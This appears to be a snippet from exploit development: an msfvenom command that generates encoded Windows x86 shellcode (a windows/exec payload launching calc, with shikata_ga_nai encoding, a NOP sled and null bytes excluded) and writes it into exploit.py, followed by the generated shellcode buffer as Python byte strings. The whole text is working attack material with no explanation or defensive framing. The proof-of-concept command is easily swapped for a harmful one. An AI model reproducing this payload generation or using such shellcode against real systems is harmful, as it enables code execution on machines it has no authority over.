msfvenom --payload windows/exec --bad-chars '\x00' --arch x86 –smallest CMD=calc --encoder x86/shikata_ga_nai --nopsled 26 --format python >> exploit.py

buf += "\xfd\x27\x48\x90\x49\xd6\x41\xf9\x9f\xf8\x48\x49\x99"
buf += "\x43\x4a\x98\xf9\x42\x3f\x99\x99\x92\xfc\xf5\x4a\x48"
buf += "\xd9\xed\xba\xd3\xb8\x94\x96\xd9\x74\x24\xf4\x5d\x33"
buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x55\x14\x03\x55\xc7\x5a"
buf += "\x61\x6a\x0f\x18\x8a\x93\xcf\x7d\x02\x76\xfe\xbd\x70"
buf += "\xf2\x50\x0e\xf2\x56\x5c\xe5\x56\x43\xd7\x8b\x7e\x64"
buf += "\x50\x21\x59\x4b\x61\x1a\x99\xca\xe1\x61\xce\x2c\xd8"
buf += "\xa9\x03\x2c\x1d\xd7\xee\x7c\xf6\x93\x5d\x91\x73\xe9"
buf += "\x5d\x1a\xcf\xff\xe5\xff\x87\xfe\xc4\x51\x9c\x58\xc7"
buf += "\x50\x71\xd1\x4e\x4b\x96\xdc\x19\xe0\x6c\xaa\x9b\x20"
buf += "\xbd\x53\x37\x0d\x72\xa6\x49\x49\xb4\x59\x3c\xa3\xc7"
buf += "\xe4\x47\x70\xba\x32\xcd\x63\x1c\xb0\x75\x48\x9d\x15"
buf += "\xe3\x1b\x91\xd2\x67\x43\xb5\xe5\xa4\xff\xc1\x6e\x4b"
buf += "\xd0\x40\x34\x68\xf4\x09\xee\x11\xad\xf7\x41\x2d\xad"
buf += "\x58\x3d\x8b\xa5\x74\x2a\xa6\xe7\x12\xad\x34\x92\x50"
buf += "\xad\x46\x9d\xc4\xc6\x77\x16\x8b\x91\x87\xfd\xe8\x6e"
buf += "\xc2\x5c\x58\xe7\x8b\x34\xd9\x6a\x2c\xe3\x1d\x93\xaf"
buf += "\x06\xdd\x60\xaf\x62\xd8\x2d\x77\x9e\x90\x3e\x12\xa0"
buf += "\x07\x3e\x37\xc3\xc6\xac\xdb\x04"